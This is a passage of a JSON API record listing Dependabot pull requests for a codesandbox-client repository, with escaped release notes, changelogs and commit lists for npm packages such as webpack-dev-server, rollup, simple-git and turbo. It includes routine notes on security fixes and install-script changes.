HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v3.3.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `rollup` from 0.46.3 to 2.80.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/releases\"\u003erollup's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev.2.79.2\u003c/h2\u003e\n\u003ch2\u003e2.79.2\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2024-09-26\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix a vulnerability in generated code that affects IIFE, UMD and CJS bundles when run in a browser context (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/5671\"\u003e#5671\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/5671\"\u003e#5671\u003c/a\u003e: Fix DOM Clobbering CVE (\u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/blob/v2.80.0/CHANGELOG.md\"\u003erollup's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.80.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-02-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThrow when the generated bundle contains paths that would leave the output directory (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6277\"\u003e#6277\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6277\"\u003e#6277\u003c/a\u003e: Validate bundle stays within output dir (\u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.79.2\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2024-09-26\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eResolve CVE-2024-43788 (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/5677\"\u003e#5677\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/5677\"\u003e#5677\u003c/a\u003e: resolve DOM Clobbering CVE-2024-43788 (backport to v2) (\u003ca href=\"https://github.com/fabianszabo\"\u003e\u003ccode\u003e@​fabianszabo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.79.1\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2022-09-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAvoid massive performance degradation when creating thousands of chunks (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4643\"\u003e#4643\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4639\"\u003e#4639\u003c/a\u003e: fix: typo docs and contributors link in CONTRIBUTING.md (\u003ca href=\"https://github.com/takurinton\"\u003e\u003ccode\u003e@​takurinton\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4641\"\u003e#4641\u003c/a\u003e: Update type definition of resolveId (\u003ca href=\"https://github.com/ivanjonas\"\u003e\u003ccode\u003e@​ivanjonas\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4643\"\u003e#4643\u003c/a\u003e: Improve performance of chunk naming collision check (\u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.79.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2022-08-31\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eamd.forceJsExtensionForImports\u003c/code\u003e to enforce using \u003ccode\u003e.js\u003c/code\u003e extensions for relative AMD imports (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4607\"\u003e#4607\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4607\"\u003e#4607\u003c/a\u003e: add option to keep extensions for amd (\u003ca href=\"https://github.com/wh1tevs\"\u003e\u003ccode\u003e@​wh1tevs\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/d17ae15336a45c3c59b2a4aacac2b14186035d28\"\u003e\u003ccode\u003ed17ae15\u003c/code\u003e\u003c/a\u003e 2.80.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\"\u003e\u003ccode\u003ed6dee5e\u003c/code\u003e\u003c/a\u003e Validate bundle stays within output dir (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6277\"\u003e#6277\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/c9bd03d12e96c46122a0372d3bbe9b468cee57da\"\u003e\u003ccode\u003ec9bd03d\u003c/code\u003e\u003c/a\u003e 2.79.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/48aef33cf2f2a6dfb175afb3bcd6a977c81f1d5c\"\u003e\u003ccode\u003e48aef33\u003c/code\u003e\u003c/a\u003e fix: resolve DOM Clobbering CVE-2024-43788 (backport to v2) (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/5677\"\u003e#5677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/69ff4181e701a0fe0026d0ba147f31bc86beffa8\"\u003e\u003ccode\u003e69ff418\u003c/code\u003e\u003c/a\u003e 2.79.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/04dce1bc734c22924b02c3d57061710dcb6395e4\"\u003e\u003ccode\u003e04dce1b\u003c/code\u003e\u003c/a\u003e Update changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/159137e6425a97c126645110d19d0533643d5ee7\"\u003e\u003ccode\u003e159137e\u003c/code\u003e\u003c/a\u003e fix: typo docs and contributors link in CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4639\"\u003e#4639\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/e1392b3905de33dc432a5692f9a6ec60103ea2f6\"\u003e\u003ccode\u003ee1392b3\u003c/code\u003e\u003c/a\u003e Update type definition of resolveId (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4641\"\u003e#4641\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/7836357aaeb1fb103318bca3f0ee8beacdec0470\"\u003e\u003ccode\u003e7836357\u003c/code\u003e\u003c/a\u003e Improve performance of chunk naming collision check (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4643\"\u003e#4643\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/71d20c9d4a75b51b95c56df43ba1efd934158acb\"\u003e\u003ccode\u003e71d20c9\u003c/code\u003e\u003c/a\u003e Reduce permissions for repl-artefacts.yml workflow (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4630\"\u003e#4630\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/rollup/rollup/compare/v0.46.3...v2.80.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~lukastaegert\"\u003elukastaegert\u003c/a\u003e, a new releaser for rollup since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `simple-git` from 3.32.3 to 3.36.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/releases\"\u003esimple-git's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esimple-git@3.36.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e89a2294: Extend known exploitable configuration keys and per-task environment variables.\u003c/p\u003e\n\u003cp\u003eNote - \u003ccode\u003eParsedVulnerabilities\u003c/code\u003e from \u003ccode\u003eargv-parser\u003c/code\u003e is removed in favour of a readonly array of \u003ccode\u003eVulnerability\u003c/code\u003e to match usage in \u003ccode\u003esimple-git\u003c/code\u003e, rolled into the new \u003ccode\u003evulnerabilityCheck\u003c/code\u003e for simpler access to the identified issues.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/zebbern\"\u003e\u003ccode\u003e@​zebbern\u003c/code\u003e\u003c/a\u003e for identifying the need to block \u003ccode\u003ecore.fsmonitor\u003c/code\u003e.\nThanks to \u003ca href=\"https://github.com/kodareef5\"\u003e\u003ccode\u003e@​kodareef5\u003c/code\u003e\u003c/a\u003e for identifying the need to block \u003ccode\u003eGIT_CONFIG_COUNT\u003c/code\u003e environment variables and \u003ccode\u003e--template\u003c/code\u003e / \u003ccode\u003emerge\u003c/code\u003e related config.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e1ad57e8: Remove conflicting node:buffer import\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [89a2294]\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [675570a]\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/argv-parser\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.1.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/args-pathspec\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.35.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0cf9d8c: Improvements for mono-repo publishing pipeline\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [0cf9d8c]\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/args-pathspec\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.2\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/argv-parser\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.35.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0de400e: Update monorepo version handling during publish\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [0de400e]\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/argv-parser\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.33.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea263635: Use \u003ccode\u003epathspec\u003c/code\u003e wrappers for remote and local paths when running either \u003ccode\u003egit.clone\u003c/code\u003e or \u003ccode\u003egit.mirror\u003c/code\u003e to\navoid leaving them less open for unexpected outcomes when passing unsanitised data into these tasks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ee253a0d: Enhanced \u003ccode\u003egit -c\u003c/code\u003e checks in \u003ccode\u003eunsa...\n\n_Description has been truncated_","html_url":"https://github.com/Dargon789/codesandbox-client/pull/137","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dargon789%2Fcodesandbox-client/issues/137","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/137/packages"},{"uuid":"4552302770","node_id":"PR_kwDOR9nArM7g1yCr","number":5,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 17 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-29T23:48:40.000Z","updated_at":"2026-05-29T23:49:25.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":17,"packages":[{"name":"turbo","old_version":"2.5.2","new_version":"2.9.14","repository_url":"https://github.com/vercel/turborepo"},{"name":"vite","old_version":"6.3.4","new_version":"6.4.2","repository_url":"https://github.com/vitejs/vite"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"svelte","old_version":"4.2.19","new_version":"5.55.7","repository_url":"https://github.com/sveltejs/svelte"},{"name":"ws","old_version":"8.17.1","new_version":"8.20.1","repository_url":"https://github.com/websockets/ws"},{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"next","old_version":"15.4.0","new_version":"15.5.18","repository_url":"https://github.com/vercel/next.js"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.22.5","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"brace-expansion","old_version":"1.1.12","new_version":"1.1.15","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"fast-uri","old_version":"3.0.3","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"flatted","old_version":"3.3.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.6","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"handlebars","old_version":"4.7.6","new_version":"4.7.9","repository_url":"https://github.com/handlebars-lang/handlebars.js"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar","old_version":"7.4.3","new_version":"7.5.15","repository_url":"https://github.com/isaacs/node-tar"},{"name":"underscore","old_version":"1.13.2","new_version":"1.13.8","repository_url":"https://github.com/jashkenas/underscore"},{"name":"yaml","old_version":"1.10.2","new_version":"1.10.3","repository_url":"https://github.com/eemeli/yaml"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 17 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [turbo](https://github.com/vercel/turborepo) | `2.5.2` | `2.9.14` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `6.3.4` | `6.4.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) | `4.2.19` | `5.55.7` |\n| [ws](https://github.com/websockets/ws) | `8.17.1` | `8.20.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n| [next](https://github.com/vercel/next.js) | `15.4.0` | `15.5.18` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.22.5` | `7.29.7` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.12` | `1.1.15` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.0.3` | `3.1.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.1` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.6` | `1.16.0` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.6` | `4.7.9` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [tar](https://github.com/isaacs/node-tar) | `7.4.3` | `7.5.15` |\n| [underscore](https://github.com/jashkenas/underscore) | `1.13.2` | `1.13.8` |\n| [yaml](https://github.com/eemeli/yaml) | `1.10.2` | `1.10.3` |\n\n\nUpdates `turbo` from 2.5.2 to 2.9.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/turborepo/releases\"\u003eturbo's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eTurborepo v2.9.14\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains important security fixes.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eHigh:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/security/advisories/GHSA-5xc8-49mv-x4mm\"\u003eGHSA-5xc8-49mv-x4mm: Turborepo VSCode Extension command 